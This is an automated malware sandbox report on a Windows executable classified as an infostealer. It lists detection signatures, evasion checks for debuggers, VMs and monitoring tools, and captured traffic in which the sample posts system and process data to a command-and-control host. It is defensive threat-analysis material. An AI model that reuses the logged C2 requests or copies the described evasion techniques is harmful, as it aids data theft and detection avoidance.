Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NWJ4JvzFcs.exe

Overview

General Information

Sample name:NWJ4JvzFcs.exe
renamed because original name is a hash value
Original sample name:91d22c615a675708fad7ddb68a64cf3f.exe
Analysis ID:1581253
MD5:91d22c615a675708fad7ddb68a64cf3f
SHA1:3f83a7beba10482293899728cd505775f250c25f
SHA256:71bee394da6e85dbc2b1d660dd215346a3a957cf2aba4ab3d505a84f7fb12798
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • NWJ4JvzFcs.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\NWJ4JvzFcs.exe" MD5: 91D22C615A675708FAD7DDB68A64CF3F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: NWJ4JvzFcs.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: NWJ4JvzFcs.exeVirustotal: Detection: 34%Perma Link
Source: NWJ4JvzFcs.exeReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: NWJ4JvzFcs.exeJoe Sandbox ML: detected
Source: NWJ4JvzFcs.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: NWJ4JvzFcs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 558871Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 39 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 558871Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 39 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:08:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:08:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: NWJ4JvzFcs.exe, 00000004.00000002.1439964126.0000000002045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: NWJ4JvzFcs.exeStatic PE information: section name:
Source: NWJ4JvzFcs.exeStatic PE information: section name: .idata
Source: NWJ4JvzFcs.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0204B4694_3_0204B469
Source: NWJ4JvzFcs.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: NWJ4JvzFcs.exeStatic PE information: Section: vsycrkux ZLIB complexity 0.994511902497233
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: NWJ4JvzFcs.exeVirustotal: Detection: 34%
Source: NWJ4JvzFcs.exeReversingLabs: Detection: 57%
Source: NWJ4JvzFcs.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: NWJ4JvzFcs.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSection loaded: kernel.appcore.dllJump to behavior
Source: NWJ4JvzFcs.exeStatic file information: File size 4522496 > 1048576
Source: NWJ4JvzFcs.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: NWJ4JvzFcs.exeStatic PE information: Raw size of vsycrkux is bigger than: 0x100000 < 0x1c3c00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeUnpacked PE file: 4.2.NWJ4JvzFcs.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vsycrkux:EW;rssptqyp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vsycrkux:EW;rssptqyp:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: NWJ4JvzFcs.exeStatic PE information: real checksum: 0x451ce9 should be: 0x459b48
Source: NWJ4JvzFcs.exeStatic PE information: section name:
Source: NWJ4JvzFcs.exeStatic PE information: section name: .idata
Source: NWJ4JvzFcs.exeStatic PE information: section name:
Source: NWJ4JvzFcs.exeStatic PE information: section name: vsycrkux
Source: NWJ4JvzFcs.exeStatic PE information: section name: rssptqyp
Source: NWJ4JvzFcs.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209CEAF pushad ; iretd 4_3_0209CEB9
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209CEAF pushad ; iretd 4_3_0209CEB9
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209AFA4 pushad ; iretd 4_3_0209B04D
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209AFA4 pushad ; iretd 4_3_0209B04D
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209CF60 pushad ; retf 4_3_0209CF61
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209CF60 pushad ; retf 4_3_0209CF61
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_02052182 pushad ; ret 4_3_020524E1
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: NWJ4JvzFcs.exeStatic PE information: section name: vsycrkux entropy: 7.955164567057714

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
